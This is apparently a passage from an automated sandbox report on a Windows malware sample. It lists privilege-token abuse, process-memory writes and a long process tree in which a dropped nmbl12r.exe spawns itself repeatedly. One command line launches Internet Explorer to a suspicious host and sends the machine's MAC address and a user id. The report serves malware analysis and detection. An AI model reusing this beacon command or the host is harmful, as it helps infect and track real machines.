SeLoadDriverPrivilege 1180 nmbl12r.exe Token: SeLoadDriverPrivilege 5080 nmbl12r.exe Token: SeLoadDriverPrivilege 4300 nmbl12r.exe Token: SeLoadDriverPrivilege 4940 nmbl12r.exe Token: SeLoadDriverPrivilege 3700 nmbl12r.exe Token: SeLoadDriverPrivilege 1960 nmbl12r.exe Token: SeLoadDriverPrivilege 864 nmbl12r.exe Token: SeLoadDriverPrivilege 4656 nmbl12r.exe Token: SeLoadDriverPrivilege 856 nmbl12r.exe Token: SeLoadDriverPrivilege 3184 nmbl12r.exe Token: SeLoadDriverPrivilege 2716 nmbl12r.exe Token: SeLoadDriverPrivilege 1800 nmbl12r.exe Token: SeLoadDriverPrivilege 4816 nmbl12r.exe Token: SeLoadDriverPrivilege 3340 nmbl12r.exe Token: SeLoadDriverPrivilege 1292 nmbl12r.exe Token: SeLoadDriverPrivilege 3856 nmbl12r.exe Token: SeLoadDriverPrivilege 3608 nmbl12r.exe Token: SeLoadDriverPrivilege 2464 nmbl12r.exe Token: SeLoadDriverPrivilege 1160 nmbl12r.exe Token: SeLoadDriverPrivilege 3744 nmbl12r.exe Token: SeLoadDriverPrivilege 5004 nmbl12r.exe Token: SeLoadDriverPrivilege 3740 nmbl12r.exe Token: SeLoadDriverPrivilege 4036 nmbl12r.exe Token: SeLoadDriverPrivilege 3764 nmbl12r.exe Token: SeLoadDriverPrivilege 4700 nmbl12r.exe Token: SeLoadDriverPrivilege 4208 nmbl12r.exe Token: SeLoadDriverPrivilege 1864 nmbl12r.exe Token: SeLoadDriverPrivilege 2132 nmbl12r.exe Token: SeLoadDriverPrivilege 4356 nmbl12r.exe Token: SeLoadDriverPrivilege 4812 nmbl12r.exe Token: SeLoadDriverPrivilege 3216 nmbl12r.exe Token: SeLoadDriverPrivilege 4608 nmbl12r.exe Token: SeLoadDriverPrivilege 4376 nmbl12r.exe Token: SeLoadDriverPrivilege 4392 nmbl12r.exe Token: SeLoadDriverPrivilege 4092 nmbl12r.exe Token: SeLoadDriverPrivilege 1136 nmbl12r.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1796 IEXPLORE.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1796 IEXPLORE.EXE 1796 IEXPLORE.EXE 216 IEXPLORE.EXE 216 IEXPLORE.EXE 216 IEXPLORE.EXE 216 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3068 wrote to memory of 4288 3068 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 84 PID 3068 wrote to memory of 4288 3068 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 84 PID 3068 wrote to memory of 4288 3068 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 84 PID 4288 wrote to memory of 1796 4288 iexplore.exe 85 PID 4288 wrote to memory of 1796 4288 iexplore.exe 85 PID 1796 wrote to memory of 216 1796 IEXPLORE.EXE 86 PID 1796 wrote to memory of 216 1796 IEXPLORE.EXE 86 PID 1796 wrote to memory of 216 1796 IEXPLORE.EXE 86 PID 3068 wrote to memory of 1676 3068 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 87 PID 3068 wrote to memory of 1676 3068 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 87 PID 3068 wrote to memory of 1676 3068 fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe 87 PID 1676 wrote to memory of 4540 1676 BNO5lPp.exe 90 PID 1676 wrote to memory of 4540 1676 BNO5lPp.exe 90 PID 1676 wrote to memory of 4540 1676 BNO5lPp.exe 90 PID 4540 wrote to memory of 924 4540 nmbl12r.exe 91 PID 4540 wrote to memory of 924 4540 nmbl12r.exe 91 PID 4540 wrote to memory of 924 4540 nmbl12r.exe 91 PID 924 wrote to memory of 4756 924 nmbl12r.exe 92 PID 924 wrote to memory of 4756 924 nmbl12r.exe 92 PID 924 wrote to memory of 4756 924 nmbl12r.exe 92 PID 4756 wrote to memory of 4952 4756 nmbl12r.exe 94 PID 4756 wrote to memory of 4952 4756 nmbl12r.exe 94 PID 4756 wrote to memory of 4952 4756 nmbl12r.exe 94 PID 4952 wrote to memory of 2260 4952 nmbl12r.exe 95 PID 4952 wrote to memory of 2260 4952 nmbl12r.exe 95 PID 4952 wrote to memory of 2260 4952 nmbl12r.exe 95 PID 2260 wrote to memory of 5084 2260 nmbl12r.exe 96 PID 2260 wrote to memory of 5084 2260 nmbl12r.exe 96 PID 2260 wrote to memory of 5084 2260 nmbl12r.exe 96 PID 5084 wrote to memory of 2052 5084 nmbl12r.exe 97 PID 5084 wrote to memory of 2052 5084 nmbl12r.exe 97 PID 5084 wrote to memory of 2052 5084 nmbl12r.exe 97 PID 2052 wrote to memory of 4480 2052 nmbl12r.exe 98 PID 2052 wrote to memory of 4480 2052 nmbl12r.exe 98 PID 2052 wrote to memory of 4480 2052 nmbl12r.exe 98 PID 4480 wrote to memory of 2360 4480 nmbl12r.exe 99 PID 4480 wrote to memory of 2360 4480 nmbl12r.exe 99 PID 4480 wrote to memory of 2360 4480 nmbl12r.exe 99 PID 2360 wrote to memory of 4960 2360 nmbl12r.exe 101 PID 2360 wrote to memory of 4960 2360 nmbl12r.exe 101 PID 2360 wrote to memory of 4960 2360 nmbl12r.exe 101 PID 4960 wrote to memory of 1700 4960 nmbl12r.exe 102 PID 4960 wrote to memory of 1700 4960 nmbl12r.exe 102 PID 4960 wrote to memory of 1700 4960 nmbl12r.exe 102 PID 1700 wrote to memory of 1544 1700 nmbl12r.exe 103 PID 1700 wrote to memory of 1544 1700 nmbl12r.exe 103 PID 1700 wrote to memory of 1544 1700 nmbl12r.exe 103 PID 1544 wrote to memory of 3596 1544 nmbl12r.exe 104 PID 1544 wrote to memory of 3596 1544 nmbl12r.exe 104 PID 1544 wrote to memory of 3596 1544 nmbl12r.exe 104 PID 3596 wrote to memory of 1804 3596 nmbl12r.exe 105 PID 3596 wrote to memory of 1804 3596 nmbl12r.exe 105 PID 3596 wrote to memory of 1804 3596 nmbl12r.exe 105 PID 1804 wrote to memory of 4980 1804 nmbl12r.exe 106 PID 1804 wrote to memory of 4980 1804 nmbl12r.exe 106 PID 1804 wrote to memory of 4980 1804 nmbl12r.exe 106 PID 4980 wrote to memory of 1672 4980 nmbl12r.exe 107 PID 4980 wrote to memory of 1672 4980 nmbl12r.exe 107 PID 4980 wrote to memory of 1672 4980 nmbl12r.exe 107 PID 1672 wrote to memory of 1368 1672 nmbl12r.exe 108 PID 1672 wrote to memory of 1368 1672 nmbl12r.exe 108 PID 1672 wrote to memory of 1368 1672 nmbl12r.exe 108 PID 1368 wrote to memory of 3524 1368 nmbl12r.exe 109 PID 1368 wrote to memory of 3524 1368 nmbl12r.exe 109
Processes
-
C:\Users\Admin\AppData\Local\Temp\fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\fb7e4180110ac2917b6a1f816438c7b9_JaffaCakes118.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe" http://dd.zxcvbnmzxcvbnm.com:9999/Chinagogogo.ashx?Mac=62:A6:B3:07:38:8A&UserId=117&Bate=1.06&ThreadNum=3&Url=;-2⤵
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://dd.zxcvbnmzxcvbnm.com:9999/Chinagogogo.ashx?Mac=62:A6:B3:07:38:8A&UserId=117&Bate=1.06&ThreadNum=3&Url=;-3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1796 CREDAT:17410 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:216
-
-
-
-
\??\c:\BNO5lPp.exec:\BNO5lPp.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:924 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4952 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5084 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe11⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2360 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1700 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe14⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe15⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe16⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe17⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe18⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe19⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe20⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3524 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe21⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4828 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe22⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2232 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe23⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3308 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe24⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3164 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe25⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4740 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe26⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:3056 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe27⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3592 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe28⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4164 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe29⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1180 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe30⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5080 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe31⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4300 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe32⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4940 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe33⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:3700 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe34⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1960 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe35⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:864 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe36⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4656 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe37⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:856 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe38⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3184 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe39⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2716 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe40⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:1800 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe41⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4816 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe42⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3340 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe43⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1292 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe44⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3856 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe45⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3608 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe46⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2464 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe47⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:1160 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe48⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3744 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe49⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:5004 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe50⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3740 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe51⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4036 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe52⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3764 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe53⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
PID:4700 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe54⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4208 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe55⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1864 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe56⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2132 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe57⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4356 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe58⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:4812 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe59⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3216 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe60⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:4608 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe61⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4376 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe62⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4392 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe63⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4092 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe64⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1136 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe65⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4944 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe66⤵PID:852
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe67⤵PID:2152
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe68⤵PID:1532
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe69⤵PID:3484
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe70⤵PID:1348
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe71⤵PID:2352
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe72⤵PID:4452
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe73⤵PID:2952
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe74⤵PID:2220
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe75⤵PID:4236
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe76⤵
- Enumerates connected drives
PID:4104 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe77⤵PID:3260
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe78⤵PID:632
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe79⤵PID:2484
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe80⤵PID:2144
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe81⤵PID:3440
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe82⤵PID:4664
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe83⤵PID:5052
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe84⤵
- System Location Discovery: System Language Discovery
PID:816 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe85⤵
- Drops file in System32 directory
PID:4820 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe86⤵PID:4692
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe87⤵
- Drops file in System32 directory
PID:3772 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe88⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:4420 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe89⤵PID:4344
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe90⤵PID:3336
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe91⤵PID:3904
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe92⤵PID:1196
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe93⤵
- Enumerates connected drives
PID:3728 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe94⤵PID:3936
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe95⤵PID:4472
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe96⤵PID:3256
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe97⤵PID:3040
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe98⤵
- System Location Discovery: System Language Discovery
PID:5148 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe99⤵PID:5180
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe100⤵
- Enumerates connected drives
PID:5204 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe101⤵PID:5220
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe102⤵PID:5244
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe103⤵PID:5264
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe104⤵PID:5284
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe105⤵PID:5304
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe106⤵PID:5328
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe107⤵PID:5348
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe108⤵PID:5364
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe109⤵
- Drops file in System32 directory
PID:5388 -
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe110⤵PID:5408
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe111⤵PID:5432
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe112⤵PID:5452
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe113⤵PID:5472
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe114⤵PID:5492
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe115⤵PID:5512
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe116⤵PID:5528
-
C:\Windows\SysWOW64\g1xxCUY\nmbl12r.exeC:\Windows\system32\g1xxCUY\nmbl12r.exe117⤵PID:5552
-
